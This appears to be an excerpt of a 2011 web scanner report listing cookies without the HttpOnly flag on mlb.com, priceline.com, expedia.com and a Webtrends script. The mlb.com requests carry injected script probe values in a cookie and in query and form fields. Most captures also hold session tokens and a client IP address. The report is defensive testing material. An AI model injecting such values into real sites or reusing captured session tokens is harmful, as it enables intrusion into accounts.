The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c893c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/barclays-infinite-credit-card.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A3D550880A45CA7718800D08622321F7; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=f4be7ca51b412f05a651eb2dbab301d2f00b6ac844996860b4fc36540ed3ea93585406a332f46bad3495034e7521af202c964aa44df684e366163b146b7fc473f5238d9659c4a8f56ec815eadf54fa4cb174c323df59d81ff973c1eb6561869c5e943c192948097db1fe1fc200988e87; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d05e2ee14; _wt.mode-79569=fcdcc722e93202f2ddfb

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=DF89E5BAA7A71BDFFD734919F4B8C6D8; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.56. https://secure.mlb.com/resetPassword.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /resetPassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /resetPassword.do HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

uri=%2Faccount%2Fforgot_password.jsp&emailAddress=*%2F%0Adocument.title%3D1317599291294048%2F*

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:21 GMT
Content-type: text/html;charset=utf-8
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 76221


                       
...[SNIP]...
14.57. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /shared/scripts/bam/bam.env.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shared/scripts/bam/bam.env.jsp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Accept-Language: en-us
Referer: https://secure.mlb.com/resetPassword.do
Accept: */*
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:42 GMT
Expires: Mon, 03 Oct 2011 01:48:42 GMT
Edge-control: max-age=7200
Content-type: text/javascript;charset=ISO-8859-1
Content-length: 811
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/


(function (window, $, bam) {

bam.env = bam.env || {};
bam.env.host = bam.env.host || {};

$.extend(bam.env.host, {

/**
* Returns base url for the CDN server

...[SNIP]...
14.58. https://secure.mlb.com/style/bam.css.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/bam.css.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/bam.css.jsp?c_id=%0Adocument.title=1317599335378049; HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:58 GMT
Expires: Mon, 03 Oct 2011 01:48:58 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 9935


/* buttons */
/* global */
.bam-button {
font-family:"Helvetica", "Helvetica Neue", arial, sans-serif;
font-size:13px;
font-weight:bold;
text-decoration:none;
-moz-border-r
...[SNIP]...
14.59. https://secure.mlb.com/style/nav_2011.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://secure.mlb.com
Path:   /style/nav_2011.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/nav_2011.jsp?c_id=%0Adocument.title=1317599336102051;&section=schedule HTTP/1.1
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-length: 0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: secure.mlb.com
Cookie: s_cc=true; stUtil_cookie=1%7C%7C9620647761317598889493; s_sq=%5B%5BB%5D%5D; SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sun, 02 Oct 2011 23:48:59 GMT
Expires: Mon, 03 Oct 2011 01:48:59 GMT
Edge-control: max-age=7200
Content-type: text/css;charset=ISO-8859-1
Set-cookie: SESSION_1=wf_flowId%3D%3D%3Dregistration.forgottenpassword%7Ewf_c_id%3D%3D%3D%22%3E%3CSCRIPT%3Edocument.title%3D1317599208257014%3C%2FSCRIPT%3E%3C%22%7Estage%3D%3D%3D2%7EflowId%3D%3D%3Dregistration.forgottenpassword; Domain=.mlb.com; Path=/
Content-Length: 16918


/* global overides */
#masthead body, #masthead div, #masthead dl, #masthead dt, #masthead dd, #masthead ul, #masthead ol, #masthead
...[SNIP]...
14.60. http://travela.priceline.com/hotel/leaveBehindPop.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/leaveBehindPop.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/leaveBehindPop.do?INIT_SESSION=false&src_path=RTL&src_page=LIST&trySecSwap=Y&checkInDate=10%2F04%2F2011&checkOutDate=10%2F07%2F2011&city=Boston%2C+MA&displayCity=Boston&cityID=3000008602&numberOfRooms=1&country=US&static=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600744165:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.2.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:32:26 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5463010a2011100300322608e011577265; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=93E8720C5EB8B62C63F1FFE2A3CCE4FE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 959
Content-Type: text/html;charset=ISO-8859-1

<html>
<head>

<script language="Javascript">
function checkDom() {
   var sTest = "";
   var newURL;
   var thisURL = window.location.href;
   var bSecSwap = true;
   try{
       sTest = window.opener.doc
...[SNIP]...
14.61. http://travela.priceline.com/hotel/newHotelSearch.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/newHotelSearch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotel/newHotelSearch.do?jsk=4663010a5564010a20111003003755e18011569968&plf=PCLN&searchType=CITY&noWait=Y HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 192
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FAF2D4913A438B844DA81A6F80DA0319; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; JSessionKey=4663010a5564010a20111003003755e18011569968; Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A37%3A55&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; PSessKey=; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602422665:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.4.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

cityName=bos&cityID=0&cityID_Name=bos&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&numberOfRooms=1&searchType=CITY&poiName=&addrLine=&poiID=&poiID_Name=&addrCity=&addrState=&addrZIP=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:37 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=8F1936C519E8273F266A95D7A4654200; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491027


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
14.62. http://travela.priceline.com/hotel/searchHotels.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 282
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:05 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a2011100300100584c011561872; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A10%3A05&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:10:05 GMT; Path=/
Set-Cookie: JSESSIONID=6F97BAD3EA8636704D7EC7753CCBB4DE; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8901
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
14.63. http://travela.priceline.com/hotel/searchHotels_process.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels_process.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /hotel/searchHotels_process.do?jsk=5463010a5064010a2011100300091519d011589950&plf=PCLN&toPage=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2Fhtml%2FErrorPage.html%3Freason%3Dtimeout HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 455
Cache-Control: max-age=0
Origin: http://travela.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=C8BF93EFF5AF47E27659D428524EE5E5; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL

checkInDate=10%2F04%2F11&checkOutDate=10%2F07%2F11&hotelBrand=&cityName=Boston%2CUnited+States&RefClickID=HOTELSEARCH&numberOfRooms=1&Initialized=Y&jsk=5463010a5064010a2011100300091519d011589950&CkInY
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:11:03 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=5D8E9AED674339BB1969FF7371C4ACDA; Path=/hotel
Location: http://travela.priceline.com/hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=ISO-8859-1

14.64. http://travela.priceline.com/hotel/searchResults.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://travela.priceline.com
Path:   /hotel/searchResults.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hotel/searchResults.do?jsk=5463010a5064010a2011100300091519d011589950&key=gtapcnq5&showDP=y&NYOPRedirNI=null HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travela.priceline.com/hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=58AA51FFBF9D4E024C54F62C7478894F; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; vsch=v2011100300090989417126%5F98264026; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; JSessionKey=5463010a5064010a2011100300091519d011589950; Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A09%3A15&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; PSessKey=

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:11:15 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSESSIONID=A33FF447E496BF38ED169D142CD825A3; Path=/hotel
Vary: Accept-Encoding
Content-Type: text/html;;charset=iso-8859-1
Content-Length: 491022


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

...[SNIP]...
14.65. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information?chkin=10%2F04%2F2011&chkout=10%2F07%2F2011&rm1=a1&hwrqCacheKey=ccf4a420-af8b-480f-8413-efb42e880287HWRQ&hashTag=roomsAndRates&rfrr=-5517&c=d20f4232-e339-420a-bcb4-97cad88f9b0f&& HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=aa0f7acd-9a8d-4dba-a7c4-36d8d1ea2a11; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.IGOUGO-US.HOTEL.HOTEL|||||||||OLA|20111101|; U9Z5=0; MediaCookie=0`1034,1004,PDEST,BOS; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
